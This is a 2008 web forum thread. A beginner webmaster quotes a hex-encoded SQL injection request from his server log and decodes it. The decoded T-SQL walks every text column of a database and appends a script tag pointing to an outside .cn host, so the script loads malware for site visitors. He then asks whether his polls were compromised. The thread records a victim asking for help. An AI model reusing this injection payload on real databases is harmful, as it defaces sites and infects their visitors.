homepage Welcome to WebmasterWorld Guest from 54.242.231.109
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / WebmasterWorld / New To Web Development
Forum Library, Charter, Moderators: brotherhood of lan & mack

New To Web Development Forum

    
SQL injection attempt (php/MySQL) help
Advice needed for cleaning up hacked website
Norskie




msg:3719895
 6:54 pm on Aug 10, 2008 (gmt 0)

I have a couple of very simple javascript polls on my site that use MySQL databases to count votes after the user selects an option using a radio button. Today, in our log, I noticed the following, which after researching, seems to be a SQL injection attempt similar to what has been going on lately:

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5
220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973
6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6
22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39
39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206
22E78747970653D31363729204F50454E205461626C655F437572736F722046455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4
043205748494C4528404046455443485F5354415455533D302920424547494E206578
65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2
72B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736
3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520
272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F736
46F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C
212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

(note: I inserted page breaks so the code wouldn't stretch the page)

I translated it to this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I know nothing about php/MySQL other than what I've learned to get the polls working. I used the phpMyAdmin section my webhost provides to check the table structures in the database, and didn't find anything different. Clicking the polls brings up the results just like they should, with no redirects or any other apparent problem.

The SQL is:

SELECT * FROM `revolvepoll_results` WHERE 1

with two fields (candidate and num_votes).

I am wondering if someone can clarify for me whether there is anything else I need to do? I read through the thread in the Databases section but the discussion is too sophisticated for a novice like me.

Thank you for any help you can give.

BTW, I've lurked here a while but forgot the screen name I used to sign up, thus the new sign-up date.

[edited by: mack at 10:29 pm (utc) on Aug. 10, 2008]
[edit reason] removed site url from code just to be safe [/edit]

 

rocknbil




msg:3719955
 10:22 pm on Aug 10, 2008 (gmt 0)

Welcome aboard Norksie, have you seen this thread [webmasterworld.com]? Well discussed there.

Norskie




msg:3719978
 10:58 pm on Aug 10, 2008 (gmt 0)

Yes, thank you rocknbil, I did read that thread before I posted in this forum, but as I said, it is too sophisticated for my understanding. The responses presume a level of knowledge I don't have, which is why I came to this "newbie" forum hoping for some simplified advice.

Perhaps I can boil down my questions to the fundamentals:

1) If I was able to execute my poll javascript from the webpage where it is located, and nothing happened except the poll results output page was generated, can I be sure the attack failed?

2) If I look at the structure of my table with phpMyAdmin, and it shows nothing more than what I set up, can be I sure nothing was inserted into the table? In other words, would it be obvious if something was there?

I am not a programmer, only a casual webmaster, and I just want to be sure my visitors don't end up with something malicious. Thank you again to anyone who has any input.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / New To Web Development
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved